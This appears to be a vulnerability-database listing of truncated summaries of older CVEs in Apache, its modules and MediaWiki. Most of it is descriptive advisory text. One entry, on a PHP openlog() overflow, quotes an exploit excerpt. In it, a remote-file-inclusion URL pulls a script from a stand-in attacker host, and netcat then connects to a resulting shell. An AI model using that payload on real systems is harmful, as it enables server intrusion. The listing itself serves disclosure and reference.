CVE-2004-1405

Affected software: MediaWiki 1.3.8 and earlier (with Apache mod_mime); also referenced as vulnerable in MediaWiki

CVE-2004-1387

The CVE-2004-1387 entry concerns the apache-utils package, specifically the check_forensic script (version 1.3.31). The vulnerability allows a local user to overwrite or create arbitrary files via a symlink attack on temporary files, with the underlying root cause being improper handling of tempo...

CVE-2005-0182

The vulnerability CVE-2005-0182 affects the mod_dosevasive Apache module, versions 1.9 and earlier. The issue arises because the module creates temporary files with predictable filenames, which could enable remote attackers to overwrite arbitrary files via a symlink attack. This could impact inte...

CVE-2003-1054

modaccessreferer 1.0.2 allows remote attackers to cause a denial of service crash via a malformed Referer header that is missing a hostname, as parsed by the apparseuricomponents function in Apache, which triggers a null dereference...

CVE-2003-1054

CVE-2003-1054 affects the Apache mod_access_referer module (version 1.0.2). A malformed Referer header missing a hostname can cause the ap_parse_uri_components function to trigger a NULL pointer dereference, resulting in denial of service (crash). The OpenVAS and NVD records corroborate the NULL-...

CVE-2005-0108

CVE-2005-0108 is a vulnerability in Apache mod_auth_radius and the libpam-radius-auth PAM module. The Debian and related advisories describe an integer underflow in the mod_auth_radius component that can be triggered by a crafted RADIUS_REPLY_MESSAGE, potentially allowing remote attackers to caus...

PHP 4.3.7 - 'openlog()' Remote Buffer Overflow

http://www.vulnerable.box/remincl.php?page=http://3v1l.h4x0r.b0x/tooopenlog.php.txt BOOM.... netcat www.vulnerable.box 65535 Microsoft Windows 2000 versie 5.00.2195 C Copyright 1985-2000 Microsoft Corp. C:\Program Files\Apache Group\Apache2 --- Getting a shell is better then parsing commands to t...

mod_ssl SSLCipherSuite bypass

The modssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration...

CVE-2004-1083

Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DSStore files and files beginning with ".ht" using alternate capitalization...

CVE-2004-1084

Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles...

security flaw

moddiskcache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information...

CVE-2004-0942

CVE-2004-0942 affects Apache 2.0.52 and earlier. A remote attacker can trigger a denial of service by sending an HTTP GET with a MIME header containing many lines of whitespace, causing CPU/memory consumption. Public references show patches and advisories across platforms (e.g., ALT Linux package...

CVE-2004-0940

CVE-2004-0940 is a confirmed vulnerability: a buffer overflow in mod_include.get_tag() affects Apache 1.3.x up to 1.3.32, allowing local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error. The impact is ...

Apache mod_include get_tag() Function Local Overflow

The remote web server appears to be running a version of Apache that is older than version 1.3.33. This version is vulnerable to a local buffer overflow in the gettag function of the module 'modinclude' when a specially crafted document with malformed server-side includes is requested though an...

CVE-2004-0747

Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables...

CVE-2004-0747

Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables...

CVE-2004-0748

modssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service CPU consumption by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop...

DEBIAN-CVE-2004-0748

modssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service CPU consumption by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop...

CVE-2004-0786

The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service child process crash via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool...

CVE-2004-0885

The CVE-2004-0885 entry describes a vulnerability in Apache's mod_ssl for versions 2.0.35–2.0.52 where, when using SSLCipherSuite in directory or location context, remote clients can bypass intended restrictions by selecting any cipher suite allowed by the virtual host configuration. The initial ...